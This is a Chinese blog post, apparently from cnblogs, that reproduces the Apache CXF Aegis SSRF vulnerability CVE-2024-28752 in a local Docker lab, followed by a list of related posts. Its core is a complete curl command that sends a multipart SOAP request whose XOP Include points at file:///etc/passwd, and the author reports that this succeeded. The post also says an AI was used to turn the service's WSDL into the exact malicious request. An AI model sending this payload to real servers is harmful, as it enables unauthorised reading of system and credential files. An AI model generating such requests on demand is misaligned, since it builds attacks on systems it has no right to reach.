CVE-2024-28752目录终端下执行docker compose up -d开启容器

访问ip:8080

验证该容器是否完全启动成功/查看服务期望的参数类型

访问 http://192.168.75.132:8080/test?wsdl

将参数类型丢给AI解析,生成精确的恶意攻击请求

curl发送精确请求

点击查看代码 
curl -X POST http://192.168.75.132:8080/test \

-H "Content-Type: multipart/related; boundary=----WebKitFormBoundary123456" \

--data-binary @- <<EOF

------WebKitFormBoundary123456

Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">

   <soapenv:Header/>

   <soapenv:Body>

      <web:test>

         <arg0>

            <count>123</count>

            <text>

               <xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"/>

            </text>

            <you>true</you>

         </arg0>

      </web:test>

   </soapenv:Body>

</soapenv:Envelope>

------WebKitFormBoundary123456--

EOF

![image](https://img2024.cnblogs.com/blog/3680810/202507/3680810-20250727195019061-220203904.png)

成功复现!解码即可查看/etc/passwd内容

CVE-2024-28752 Apache CXF Aegis databinding SSRF漏洞 (复现)的更多相关文章

  1. apache httpd多后缀解析漏洞复现

    apache httpd多后缀解析漏洞复现 一.漏洞描述 Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析 ...

  2. Apache SSI 远程命令执行漏洞复现

    Apache SSI 远程命令执行漏洞复现 一.漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令. 使 ...

  3. Apache Solr JMX服务 RCE 漏洞复现

    Apache Solr JMX服务 RCE 漏洞复现 ps:Apache Solr8.2.0下载有点慢,需要的话评论加好友我私发你 0X00漏洞简介 该漏洞源于默认配置文件solr.in.sh中的EN ...

  4. Apache log4j2 远程代码执行漏洞复现👻

    Apache log4j2 远程代码执行漏洞复现 最近爆出的一个Apache log4j2的远程代码执行漏洞听说危害程度极大哈,我想着也来找一下环境看看试一下.找了一会环境还真找到一个. 漏洞原理: ...

  5. Jira未授权SSRF漏洞复现(CVE-2019-8451)

    0x00 漏洞背景 Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击 ...

  6. CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

    0x00 漏洞背景 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重 0x01 影响范围 Apache Solr < 8.2.0 0x0 ...

  7. Apache Dubbo Provider默认反序列漏洞复现(CVE-2020-1948)

    Apache Dubbo Provider默认反序列漏洞(CVE-2020-1948) 0x01 搭建漏洞环境 漏洞介绍 2020年06月23日, 360CERT监测发现Apache Dubbo 官方 ...

  8. CVE-2021-25646:Apache Druid远程命令执行漏洞复现

    漏洞概述 Apache Druid 是一个分布式的数据处理系统.Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码.在Druid 0.20.0及更低版本中, ...

  9. Apache Kylin远程代码执行漏洞复现(CVE-2020-1956)

    Apache Kylin远程代码执行(CVE-2020-1956) 简介 Apache Kylin 是美国 Apache 软件基金会的一款开源的分布式分析型数据仓库.该产品主要提供 Hadoop/Sp ...

  10. Apache Unomi 远程代码执行漏洞复现(CVE-2020-13942)

    一.漏洞描述 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验.在Apa ...

随机推荐

  1. IDEA 使用@Autowired提示Field injection is not recommended

    摘要:IDEA 使用@Autowired提示Field injection is not recommended问题的解决办法.   在使用@Autowired注解进行bean注入,完成自动装配的工作 ...

  2. git创建远程分支

    如果有个叫 serverfix 的分支需要和他人一起开发,有两种方式可以创建远程分支origin/serverfix 1.git push origin serverfix 2.git push or ...

  3. 手把手 Flexbox——从零开始的奶奶级 Web 开发教程3

    上一篇讲了盒子模型,今天我们要涉及的主题是 Flexbox. 先来点顾名思义,Flex,折叠:box,盒子.可以折叠的盒子,也称作弹性盒子,就是可以根据可用的空间进行缩放的网页元素. 既然是盒子,那么 ...

  4. 关于python的一些学习笔记

    一种是利用三引号的方法.三引号下默认允许自动换行,第二种就是在文字之间插入\n这种方式(使用转义字符) 这里是关于转义字符的一些总结. 2.关于运算符号 小学除法取余%,中学开n方**,小学除法取整/ ...

  5. 直击运维痛点,大数据计算引擎 EasyMR 的监控告警设计优化之路

    当企业的业务发展到一定的阶段时,在系统中引入监控告警系统来对系统/业务进行监控是必备的流程.没有监控或者没有一个好的监控,会导致开发人员无法快速判断系统是否健康:告警的实质则是"把人当服务用 ...

  6. hot100之双指针

    移动0(283) 先看代码 class Solution { public void moveZeroes(int[] nums) { int idx0 = 0; for (int idx = 0; ...

  7. ET框架对MongoDB的使用

    一:本地测试: 1:加载DB组件 2:调整用户ID :  C2G_LoginGateHandler中创建玩家时id调整.(每次重启服务端创建小人ID是一样的,插入数据库会覆盖掉上传插入的数据) 3:在 ...

  8. 花150元,我用 AI 做出了千万播放的爆款视频!保姆级教程+完整提示词

    大家好,我是程序员鱼皮.这两天正在研究 怎么切显卡,只切贵的,不切对的: 我是怎么做到的呢?下面会分享. 这段时间,网上出现了很多利用 AI 制作 ASMR 视频的博主,其中比较有代表性的一位,几天的 ...

  9. Windows命令行shutdown命令和快速启动之间的一点坑

    Hybrid shutdown 自Win8.1开始,在休眠和完全关闭之外,多出一个"混合关闭(hybird shutdown)"的状态.在"控制面板\硬件和声音\电源选项 ...

  10. java日常问题和技巧2

    整理到一个工具类里面,用到了spring和alibaba.fastjson package common; import java.text.ParseException; import java.t ...